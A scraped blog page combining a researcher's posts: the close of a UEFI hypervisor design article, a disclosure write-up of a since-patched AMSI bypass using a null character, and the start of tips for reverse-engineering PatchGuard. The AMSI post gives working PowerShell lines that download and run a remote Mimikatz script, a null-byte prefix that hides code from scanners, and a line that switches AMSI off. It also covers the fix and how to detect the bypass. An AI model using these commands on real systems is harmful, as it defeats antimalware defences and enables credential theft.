<span style="font-family: inherit;"><span style="font-size: 18px;">Compiling the hypervisor as a runtime driver works, as demonstrated in the project. However, the more common approach is to build the hypervisor as a separate file and have a UEFI application load it into memory and start executing it. </span></span><span style="font-size: 18px;">That is how the VMware hypervisor and Hyper-V are implemented, for example. </span><span style="font-family: inherit; font-size: 18px;">The standalone hypervisor format is often ELF because of </span><span style="font-family: inherit; font-size: 18px;">wider cross-platform compiler and debugging tool support. </span></div>
<div>
<span style="font-family: inherit; font-size: 18px;"><br /></span></div>
<div>
<span style="font-family: inherit;"><span style="font-size: 18px;">This approach has the advantage that the hypervisor code remains platform agnostic and reusable; for example, one can write a small Windows driver as a hypervisor loader without mixing platform-dependent loader code with hypervisor code that should be platform independent. The hypervisor module then remains portable.</span><span style="font-size: 18px;"><br /></span></span><br />
<span style="font-family: inherit;"><span style="font-size: 18px;"><br /></span><span style="font-size: 18px;">MiniVisor did not take this approach only because it started as an experiment and grew without much structure. I plan to restructure the project in this way. </span></span><br />
<span style="font-size: 18px;"><br /></span></div>
<h2>
<span style="font-size: 13.5pt;">Conclusion</span></h2>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">We reviewed some unique aspects of
the UEFI environment and how they affect the design and implementation of
hypervisors compared with those designed under the blue-pill model. We also
looked at how MiniVisor was designed to work with those new factors and the
limitations they imply.</span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">While this short blog post may
not be sufficient for some readers to get a clear idea of those challenges and the
solutions explained, I hope it gives you some pointers for studying the codebase of
MiniVisor and helps make sense of why things are written differently than in
blue pill-style Windows hypervisors.</span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br />
<h3>
Further Learning</h3>
</div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">As a final note, if you are
particularly curious about using hypervisors as a research tool and/or just want a
solid understanding of the underlying technologies and concepts, Bruce Dang and
I plan to offer a 5-day class this October. It will let you write your own
hypervisor for both Windows and UEFI environments, develop "something
useful", and
play with it on physical and virtual machines to internalize technical details. </span><br />
<span style="color: black; font-size: 13.5pt;"><br /></span>
<span style="color: black; font-size: 13.5pt;">Please sign up from this page or contact
us if you are interested.<br /><a href="https://gracefulbits.regfox.com/hypervisor-development-for-security-analysis">https://gracefulbits.regfox.com/hypervisor-development-for-security-analysis</a></span></div>
Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com5tag:blogger.com,1999:blog-2937860723034111347.post-91404873575811813822018-02-16T15:21:00.001-08:002018-02-16T19:05:48.358-08:00AMSI Bypass With a Null CharacterIn this blog post, I am going to look into a flaw I reported a few months ago and see how the flaw could have been exploited to execute malicious PowerShell scripts and commands while bypassing AMSI based detection. This issue <a href="https://portal.msrc.microsoft.com/en-us/security-guidance/acknowledgments" target="_blank">has been fixed</a> as defense-in-depth with the February Update.<br />
<div>
<br /></div>
<h2>
What is AMSI</h2>
<div>
AMSI, the Antimalware Scan Interface, is a mechanism that Windows 10+ provides to security software vendors for developing software that subscribes to certain events and detects malicious contents. AMSI issues several types of events, but the one most commonly used by software vendors is arguably the event about execution of scripts, where software can receive the contents of the scripts and commands about to be executed (I will simply refer to them as contents), then scan and block them. </div>
<div>
<br /></div>
<div>
The illustration below is an overview of how this event is generated and delivered to security software for scanning.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigjb2QUEWIr6q-fmn-0b2xOe843MZEw5wWz-AG9jt0RDuvN9QvZoB7BAgJ_EMdz35DpEnhi7xAV4iyEBUEOxvPAdFOCydNvlbZKPFAacjtZ51RvrZTIZ2_8ueStXBNOFGAzj7wLrnn2Fo/s1600/aa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="298" data-original-width="1410" height="134" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigjb2QUEWIr6q-fmn-0b2xOe843MZEw5wWz-AG9jt0RDuvN9QvZoB7BAgJ_EMdz35DpEnhi7xAV4iyEBUEOxvPAdFOCydNvlbZKPFAacjtZ51RvrZTIZ2_8ueStXBNOFGAzj7wLrnn2Fo/s640/aa.png" width="640" /></a></div>
<div>
<br /></div>
<div>
The red boxes are security software that subscribes to the events from AMSI; they are called AMSI providers. When supported script engines such as PowerShell (i.e., System.Management.Automation.dll) and Windows Script Host (e.g., JScript.dll) execute contents, they call one of the functions exported from amsi.dll, passing the contents to be scanned by AMSI providers. </div>
<div>
<br /></div>
<div>
As illustrated above, AMSI providers rely on script engines to call the exported function and forward contents properly through amsi.dll; otherwise, they would not receive the contents and could not detect malicious strings.</div>
<div>
<br /></div>
<h2>
The Bug</h2>
<div>
The bug was that System.Management.Automation.dll did not take into account that PowerShell contents could include null characters, and it forwarded contents to AMSI providers by calling AmsiScanString, which treats a null character as the end of the contents. Here is the prototype of the API.</div>
<div>
----</div>
<div>
<pre class="" style="overflow: auto; padding: 5px; white-space: pre-wrap; word-break: break-word; word-wrap: break-word;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">HRESULT WINAPI AmsiScanString(
_In_ HAMSICONTEXT amsiContext,
_In_ LPCWSTR string, <span style="white-space: normal;"><span style="color: #6aa84f;">// Will be terminated at the first null character</span></span>
_In_ LPCWSTR contentName,
_In_opt_ HAMSISESSION session,
_Out_ AMSI_RESULT *result
);</span></pre>
</div>
<div>
----</div>
<div>
<br /></div>
<div>
Because of this bug, amsi.dll could truncate contents (the value of "string" above) at the first null character before sending them to AMSI providers. As a result, AMSI providers were unable to scan all of the contents and detect malicious strings.</div>
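<div>
The truncation can be reproduced outside of AMSI with a few lines of portable C. The sketch below is only a model of the behavior: scan_as_string mimics a scanner that receives a null-terminated string, as with AmsiScanString, while buffer_contains mimics one that is given an explicit length, as an interface like AmsiScanBuffer allows. Both function names are made up for this example, and no AMSI API is actually called.</div>

```c
#include <assert.h>
#include <stddef.h>
#include <wchar.h>

/* Returns 1 if needle occurs within the first length characters of buffer.
   Embedded null characters in buffer are treated as ordinary characters. */
int buffer_contains(const wchar_t *buffer, size_t length, const wchar_t *needle)
{
    assert(buffer != NULL && needle != NULL);
    size_t needle_length = wcslen(needle);
    assert(needle_length > 0);
    for (size_t i = 0; i + needle_length <= length; i++) {
        if (wmemcmp(buffer + i, needle, needle_length) == 0) {
            return 1;
        }
    }
    return 0;
}

/* Models a scanner that only sees a null-terminated string: everything
   after the first null character is invisible to it. */
int scan_as_string(const wchar_t *contents, const wchar_t *needle)
{
    return buffer_contains(contents, wcslen(contents), needle);
}
```

<div>
For contents such as L"#\0Invoke-Mimikatz", scan_as_string sees only "#" and misses the signature, whereas buffer_contains called with the full length of 17 characters finds it.</div>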
<div>
<br /></div>
<h2>
Exploitation</h2>
<div>
The basic idea for exploitation is to place a null character into PowerShell contents before malicious strings appear.</div>
<div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhBsfBsIn5d6kLsVle5tpkJXNd6GLHxtxbicE1YYV4vec4QvlGRpUcaQLUdLoF1cu9Dj8TT_-IvaN8JCHetSAKaGlSqDXbCYmz60W9G85NUUkqG5XVYVgyYPpGe25uSBw47rCu7wjMnE8/s1600/bb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="248" data-original-width="1412" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhBsfBsIn5d6kLsVle5tpkJXNd6GLHxtxbicE1YYV4vec4QvlGRpUcaQLUdLoF1cu9Dj8TT_-IvaN8JCHetSAKaGlSqDXbCYmz60W9G85NUUkqG5XVYVgyYPpGe25uSBw47rCu7wjMnE8/s640/bb.png" width="640" /></a></div>
<h3>
File Based Exploitation</h3>
<div>
As a basic exploitation scenario, let us assume we are trying to execute Invoke-Mimikatz like this and are being detected.</div>
<div>
----</div>
<div>
<span style="font-family: "verdana" , sans-serif; font-size: x-small;">> powershell "IEX (New-Object Net.WebClient).DownloadString('https://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-<span style="color: red;">DefaultMimikatz</span>.ps1')"</span></div>
<div>
----</div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEV-qfcRVxz7s7ycehmKL9GssfnlNK2b-6fWjKmkkbBDNKthEy_quD-9uBqn5vW8TWseDuWU5mvV7AQRarXc1zEN1ApM3au1Muy0EqVnBODBkgc9eufNJCOHMANtBbUOyRWikrYBCNfWY/s1600/detected.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="764" data-original-width="1600" height="304" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEV-qfcRVxz7s7ycehmKL9GssfnlNK2b-6fWjKmkkbBDNKthEy_quD-9uBqn5vW8TWseDuWU5mvV7AQRarXc1zEN1ApM3au1Muy0EqVnBODBkgc9eufNJCOHMANtBbUOyRWikrYBCNfWY/s640/detected.png" width="640" /></a></div>
<br />
This is because the contents being Invoke-Expression'd are visible to AMSI providers, as shown in the screenshot below.</div>
<div class="separator" style="clear: both; text-align: center;">
<img border="0" data-original-height="701" data-original-width="1600" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2yJoiu0q-hjY3JLk0Y0XrVqMFA1DGy_JHBrPGrKQoPkVgfcj-33qT1h3FJvdksBbYpEcKk0QRmEhCB_uEdYQ9fDRUD_MQHSTaNHvGKhYRhzyAsZM0b_Z9OGWj8GGYpndujC5QiU0bGbo/s640/visible.png" width="640" /></div>
<div>
<br /></div>
<div>
Such detection can be bypassed by placing a null character at the beginning of the file being Invoke-Expression'd.</div>
<div class="separator" style="clear: both; text-align: center;">
<img border="0" data-original-height="325" data-original-width="1548" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSRZpNB9D2EuXYbFq4OCHWS72_-iIk_yRSsw95dx0uhXzHfGC4eFdMGXnAwZnH0hq8j4iRVx0Cr03OjT_cUDXolFt0U3A3mDedLhzP6wBI2x7Bi8XqPKRgClLJRHwN9RFrhhJc-ofcKzM/s640/diff.png" width="640" /></div>
<div>
<div>
<br /></div>
<div>
----</div>
<div>
<span style="font-family: "verdana" , sans-serif; font-size: x-small;">> powershell "IEX (New-Object Net.WebClient).DownloadString('https://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-<span style="color: red;">BypassingMimikatz</span>.ps1')"</span></div>
<div>
----</div>
</div>
<div>
This successfully bypasses scanning and detection by AMSI providers, as seen below ("Get-ChildItem Function: | Select-String Invoke" is added for demonstration purposes).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAxZwqRpHD94TSPbj8Tpkqlo4qWY63_gR_uL_2ndEHdF0k2QGv5ODHMTSUA3fWnm3g2m9w4E0_YP39HrEb-MWSriUQAHlstJzgvzcytW9ahk2oBwygFANZT6v6kuxTayxRL0b7GLQeJwE/s1600/ok.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="555" data-original-width="1430" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAxZwqRpHD94TSPbj8Tpkqlo4qWY63_gR_uL_2ndEHdF0k2QGv5ODHMTSUA3fWnm3g2m9w4E0_YP39HrEb-MWSriUQAHlstJzgvzcytW9ahk2oBwygFANZT6v6kuxTayxRL0b7GLQeJwE/s640/ok.png" width="640" /></a></div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<img border="0" data-original-height="675" data-original-width="1600" height="268" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJgKrfhyphenhyphenjzg7qdukTevUb4K7wd20OjIJVVlqXPGJWAQBBmxLrLVCrQCDhY-DE8ql2D45M1jMtNumXoUU_xycb3xA9rIgBpMjp8R-sYzvZm23tf6c25TTNFRd55eCZtD_Fz-2BDfG-eiYk/s640/not.png" width="640" /></div>
<div>
<br /></div>
<h3>
Command Line Based Exploitation</h3>
<div>
With the above successful bypass, you might try to execute the loaded Invoke-Mimikatz like below, only to find that it gets detected due to the appearance of "Invoke-Mimikatz" in the command line.</div>
<div>
----</div>
<div>
<span style="font-family: "verdana" , sans-serif; font-size: x-small;">powershell "IEX (New-Object Net.WebClient).DownloadString('https://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-BypassingMimikatz.ps1');<span style="color: red;"> Invoke-Mimikatz -DumpCerts</span>"</span></div>
<div>
----</div>
<div>
<br /></div>
<div>
A naive approach with Invoke-Expression could bypass detection based on the process command line but not AMSI-based detection, as "Invoke-Mimikatz" will still be visible to AMSI providers. Here is such an unsuccessful attempt.</div>
<div>
<div>
----</div>
<div>
<span style="font-family: "verdana" , sans-serif; font-size: x-small;">powershell "IEX (New-Object Net.WebClient).DownloadString('https://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-BypassingMimikatz.ps1'); <span style="color: red;">IEX ('Invoke-'+'Mimikatz -DumpCerts')"</span></span></div>
<div>
----</div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<img border="0" data-original-height="509" data-original-width="1600" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdk8sTdJsU8WSUBGz7M1iVEGwFmYajMGsxs297j-Oev79lQ5btV6UZKNoaz3tOqUzHK9JFY8WvChsfE2vGM6sLYyX4lDdqMPLC6DUHMylltyei-xTFefX5_CelRI6vYyppct7qyF_UnWQ/s640/cred_fail.png" width="640" /></div>
<div>
<br /></div>
<div>
To bypass AMSI detection in this scenario, we can insert a null character into the command line with a bit of string manipulation.</div>
<div>
----</div>
<div>
<span style="font-size: x-small;"><span style="font-family: "verdana" , sans-serif;">powershell "IEX (New-Object Net.WebClient).DownloadString('https://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-</span><span style="font-family: "verdana" , sans-serif;">BypassingMimikatz</span><span style="font-family: "verdana" , sans-serif;">.ps1'); IEX ('<span style="color: red;">if(0){{{0}}}' -f $(0 -as [char]) + </span>'Invoke-'+'Mimikatz -DumpCerts')"</span></span></div>
<div>
----</div>
<div>
<br /></div>
<div>
The highlighted part prepends to the original command line a null character that never gets executed. The resulting string will look like this.</div>
<div>
----</div>
<div>
<span style="font-size: x-small;"><span style="color: red; font-family: "verdana" , sans-serif;">if (0) {<NULL>}</span><span style="font-family: "verdana" , sans-serif;"> the rest of commands</span></span></div>
<div>
----</div>
<div>
<br /></div>
<div>
This can successfully prevent AMSI providers from receiving all of the contents and detecting "Invoke-Mimikatz."</div>
<div>
<img border="0" data-original-height="522" data-original-width="1600" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3oEw-8-bqnow8cljnt0HMGLeuzh22d7JtHSv_jP_qVHXO5ksGkT_GPQp3fOva3Kv66D4xnAhVLhMfW8k23o_jADUleE-XKt5mY0_n03HncnSZ-kZUQKswxKNgxbg8V0hlqaGw3TqmzQQ/s640/bypass.png" width="640" /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<img border="0" data-original-height="1166" data-original-width="1600" height="466" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpp86yg5YbCC4RP4nOXq2YJtwi0_ELtRS-eWuoHjzTPZcNGzLZMfxsEfgwHiDOjoQUrtXfoyBmS41THPeX_PRK2KOMgp_eiNI_hl8WUqjafGUBQpTElSi2xVLySkZmNWedRp4SDh3VDgM/s640/mimi.png" width="640" /></div>
<div>
<br /></div>
<h3>
Summary of Exploitation</h3>
<div>
For file contents, insert "#<NULL>" at the beginning of the file and at any places where additional scans with AMSI occur. To identify the latter places, some trial and error will be needed. Using a debugger and logging invocations of AmsiScanString with the command below will be helpful.</div>
<div>
----</div>
<div>
<span style="font-family: "verdana" , sans-serif; font-size: x-small;">bp amsi!AmsiScanString "du @rdx;g"</span></div>
<div>
----</div>
<div>
<div>
<br /></div>
<div>
For command line contents, wrap them into Invoke-Expression and prepend "'if(0){{{0}}}' -f $(0 -as [char]) +". Here is another step-by-step example to bypass detection on "AmsiUtils" and "amsiInitFailed" in the below contents:</div>
<div>
----</div>
<div>
<span style="font-family: "verdana" , sans-serif; font-size: x-small;">[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)</span></div>
<div>
----</div>
<div>
<br /></div>
<div>
1. Wrap the original contents with Invoke-Expression.</div>
<div>
----</div>
<div>
<span style="font-family: "verdana" , sans-serif; font-size: x-small;"><span style="color: red;">IEX</span> <span style="color: red;">('</span>[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiInitFailed","NonPublic,Static").SetValue($null,$true)<span style="color: red;">')</span></span></div>
<div>
----</div>
<div>
<br /></div>
<div>
2. Prepend the null character to bypass AMSI based detection.</div>
<div>
----</div>
<div>
<span style="font-family: "verdana" , sans-serif; font-size: x-small;">IEX (<span style="color: red;">'if(0){{{0}}}' -f $(0 -as [char]) +</span> '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiInitFailed","NonPublic,Static").SetValue($null,$true)')</span></div>
<div>
----</div>
<div>
<br /></div>
<div>
3. Make any modification sufficient to bypass command line based detection.</div>
<div>
----</div>
<div>
<span style="font-family: "verdana" , sans-serif; font-size: x-small;">IEX ('if(0){{{0}}}' -f $(0 -as [char]) + '[Ref].Assembly.GetType("System.Management.Automation.<span style="color: red;">Amsi'+'Utils</span>").GetField("<span style="color: red;">amsi'+'InitFailed</span>","NonPublic,Static").SetValue($null,$true)')</span></div>
</div>
<div>
----</div>
<div>
<br /></div>
<div>
It is worth noting that this exploitation is usable even in Constrained Language Mode and does not trigger any event logs, unlike most AMSI bypass techniques, which use reflection.</div>
<div>
<br /></div>
<h2>
Fix and Recommendation</h2>
<div>
The fix Microsoft made was to use AmsiScanBuffer instead of AmsiScanString in System.Management.Automation.dll. As shown below, this function accepts an arbitrary byte sequence as its contents.</div>
<div>
<div>
----</div>
<div>
<pre style="overflow: auto; padding: 5px; white-space: pre-wrap; word-break: break-word; word-wrap: break-word;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">HRESULT WINAPI AmsiScanBuffer(
_In_ HAMSICONTEXT amsiContext,
_In_ PVOID buffer, <span style="color: #6aa84f;">// Not terminated at the null character</span>
_In_ ULONG length,
_In_ LPCWSTR contentName,
_In_opt_ HAMSISESSION session,
_Out_ AMSI_RESULT *result
);</span></pre>
</div>
<div>
----</div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYLJzvmbW8XRMIqQwvkA1EBZh_2Th_TbPjq0LUHOMwG6NmCcfhjaCWcKJ6pOMHSDQI4fr3JsAMuHK1GwjOCRZ9RhujLLddjCZ9dTxowcODyfoLxRmJTHs1JQAkG7r7Q8sw5G1v8NR8n2E/s1600/patch.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="397" data-original-width="1600" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYLJzvmbW8XRMIqQwvkA1EBZh_2Th_TbPjq0LUHOMwG6NmCcfhjaCWcKJ6pOMHSDQI4fr3JsAMuHK1GwjOCRZ9RhujLLddjCZ9dTxowcODyfoLxRmJTHs1JQAkG7r7Q8sw5G1v8NR8n2E/s640/patch.png" width="640" /></a></div>
<div>
<br /></div>
<div>
This way, AMSI providers can receive and scan the entire contents even if a null character appears in the middle.</div>
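<div>
The difference between the two interfaces can be modeled with a toy example. The sketch below is not how any real AMSI provider is implemented; scan_as_string and scan_as_buffer are hypothetical names, and the only assumption is that a string-based scan stops at the first null character while a buffer-based scan sees every character up to the given length.</div>

```python
def scan_as_string(content: str, signature: str) -> bool:
    """Mimic a provider that receives a null-terminated string."""
    # Everything after the first null character is never seen.
    visible = content.split("\0", 1)[0]
    return signature in visible


def scan_as_buffer(content: str, signature: str) -> bool:
    """Mimic a provider that receives a buffer together with its length."""
    # The whole buffer is visible, embedded null characters included.
    return signature in content


content = "if(0){\0}" + "Invoke-Mimikatz -DumpCerts"
print(scan_as_string(content, "Invoke-Mimikatz"))
print(scan_as_buffer(content, "Invoke-Mimikatz"))
```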
<div>
<br /></div>
<div>
In theory, no action other than applying the patch should be required. However, software vendors using AMSI to scan PowerShell contents should review whether their providers handle null characters properly should they appear.<br />
<br />
Additionally, security researchers and users of security software can test if their AMSI providers are vulnerable to the bypass technique and ask vendors to address issues if needed. Also, it might be worth monitoring any appearance of a null character in PowerShell contents to detect attempts to exploit this issue.</div>
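<div>
As a rough sketch of the monitoring idea, the check below reports where null characters appear in a piece of script text. How the text is collected (for example, from script block logs) is outside the scope of this sketch, and find_null_offsets is a hypothetical helper name.</div>

```python
def find_null_offsets(script_text: str) -> list:
    """Return the character offsets of every null character in the text."""
    return [i for i, ch in enumerate(script_text) if ch == "\0"]


sample = "if(0){\0}Invoke-Something"
offsets = find_null_offsets(sample)
if offsets:
    print("null character(s) found at offsets:", offsets)
```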
<div>
<br /></div>
<div>
As for other script engines, PowerShell Core is also affected but does not yet have a patch as of this writing. Windows Script Host is not affected because its interpreter stops reading script contents at the first null character, unlike PowerShell.</div>
<div>
<br /></div>
<h2>
Acknowledgement</h2>
<div>
Kudos to Alex Ionescu (@aionescu) for helping me report this issue, and Microsoft for fixing it.</div>
Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com3tag:blogger.com,1999:blog-2937860723034111347.post-30514418043697917222015-10-15T22:09:00.000-07:002015-10-16T21:36:21.960-07:00Some Tips to Analyze PatchGuard<div class="separator" style="clear: both; text-align: left;">
I published a new tool called <a href="https://github.com/tandasat/meow" target="_blank">meow</a> that disables PatchGuard on Windows 8.1 on-the-fly. Though meow has some interesting technical details I could explain, such as support of ARM (Windows RT) and detection of the end of a function for installing an epilogue hook, in this entry I am going to explain some techniques that help researchers analyze PatchGuard on their own rather than how this specific exploitation works. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Those techniques are worth sharing because PatchGuard is a moving target, and you have to be able to analyze it yourself if you hope to do something with it. meow is not going to work forever due to updates to the implementation of PatchGuard, and it may not be perfect even at the time of publication of this article.</div>
<br />
<h3>
Summary</h3>
As with your regular reverse engineering work, you can analyze PatchGuard by both static and dynamic means, but there are some hurdles specific to PatchGuard analysis on both sides, for example:<br />
<br />
<ul>
<li>PatchGuard related functions do not have descriptive names, or do not have names at all, unlike other functions in the kernel</li>
<li>Most function calls in PatchGuard functions are indirect calls, as in C++ code</li>
<li>Kernel debugging is not an option in some situations</li>
<li>Code is copied into random locations and stored in an encrypted form, so you cannot easily spot where to monitor at run time</li>
</ul>
<br />
Those are significant difficulties you face at the initial stage of analysis, but also ones you can easily overcome if you know some tricks I describe here. The tricks are as follows:<br />
<br />
<ul>
<li>Identifying PatchGuard functions</li>
<ul>
<li>Locating an initialization function and checking cross-references</li>
<li>Naming functions in a consistent manner</li>
<li>Checking the existence of SEH</li>
</ul>
<li>Analyzing 0x109 Crash Dump for Re-constructing the PatchGuard context</li>
<ul>
<li>Dissecting bug check parameters</li>
<li>Applying the format of the context to IDA</li>
</ul>
<li>Discovering Threads Executing PatchGuard Code</li>
<ul>
<li>Finding system threads on memory </li>
</ul>
</ul>
<br />
Let us go through them one by one.<br />
<br />
<h3>
Identifying PatchGuard functions</h3>
Firstly, you can easily find the initialization function of PatchGuard by sorting the function list by length. The largest function in ntoskrnl.exe is the initialization function, which is executed at system initialization and sets up large structures, the so-called PatchGuard contexts, on non-pageable memory (I am going to describe the structure of the context later). I call this function Pg_xInitializePatchGuard() in this article.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVTlAlwQtFdbZ6WlFdWehrD_QwmuV8cU0zSbqoYMROxVveSigfQiOgC-IVeok0th5g61DYBeWIka6ThG25rkB5jErkJaVwKuS3Srv6-ARptM6t9dXy8gOH2puov1NKfy6vzorKQxwy2YM/s1600/1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVTlAlwQtFdbZ6WlFdWehrD_QwmuV8cU0zSbqoYMROxVveSigfQiOgC-IVeok0th5g61DYBeWIka6ThG25rkB5jErkJaVwKuS3Srv6-ARptM6t9dXy8gOH2puov1NKfy6vzorKQxwy2YM/s1600/1.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 1: The largest functions on x64 </td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCAqKhOoGMKlI0MFBwgtxGiom4HRjF-dARcU4uqHuHvnQMHFItaoXpd6-pd9iZxw6yjczfgBdLCyCbwtZumMs0vhiqJ1Db0zjuFTNUq3d-O9ac16USpqgf9ei7ZKCbmzfeWk_fnCwVg0I/s1600/1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCAqKhOoGMKlI0MFBwgtxGiom4HRjF-dARcU4uqHuHvnQMHFItaoXpd6-pd9iZxw6yjczfgBdLCyCbwtZumMs0vhiqJ1Db0zjuFTNUq3d-O9ac16USpqgf9ei7ZKCbmzfeWk_fnCwVg0I/s1600/1.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 2: The largest functions on ARM</td></tr>
</tbody></table>
<br />
Secondly, you can identify other PatchGuard related functions by cross-referencing function calls. If a function is referenced only from other PatchGuard related functions, it is safe to assume that the function is dedicated to PatchGuard and needs to be analyzed. As an example, let us take a look at a caller of Pg_xInitializePatchGuard(), KiFilterFiberContext(). You see that this function is referenced from Pg_xInitializePatchGuard() and another unnamed function, sub_1407339C3(), which is not called from anywhere. At this stage, it is safe to say that KiFilterFiberContext() and sub_1407339C3() are used only for PatchGuard.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8NxUlKVh1sBBtIVlLPSRtAYlO9dms2QTs_X0trVY7e1tqMh5_qoVSeVEi8KsjV7-dOrqi3rW978dc3HuWmKSg2a2dXPVTsOdReVq-sc-JoCwziEbtFv0_u_WKeSIu8or9TGdQ7V6LWqk/s1600/2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8NxUlKVh1sBBtIVlLPSRtAYlO9dms2QTs_X0trVY7e1tqMh5_qoVSeVEi8KsjV7-dOrqi3rW978dc3HuWmKSg2a2dXPVTsOdReVq-sc-JoCwziEbtFv0_u_WKeSIu8or9TGdQ7V6LWqk/s1600/2.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 3: Callers of Pg_xInitializePatchGuard()</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBPFKO-ntnPjxNQdVsbaVMigh6KD9KSqUwhaVlx8ZobOq9czY5eVol_h_HkOWO7NRqTyXRu0y_9NLfmuIsQxRKM4Ccg1Yk9ziAPV5Eli7Mu5P7GxW_DQ17B1Le2uGJ932Gbm1JcEOGs14/s1600/3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBPFKO-ntnPjxNQdVsbaVMigh6KD9KSqUwhaVlx8ZobOq9czY5eVol_h_HkOWO7NRqTyXRu0y_9NLfmuIsQxRKM4Ccg1Yk9ziAPV5Eli7Mu5P7GxW_DQ17B1Le2uGJ932Gbm1JcEOGs14/s1600/3.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 4: Callers of sub_1407339C3()</td></tr>
</tbody></table>
<br />
<div class="separator" style="clear: both; text-align: center;">
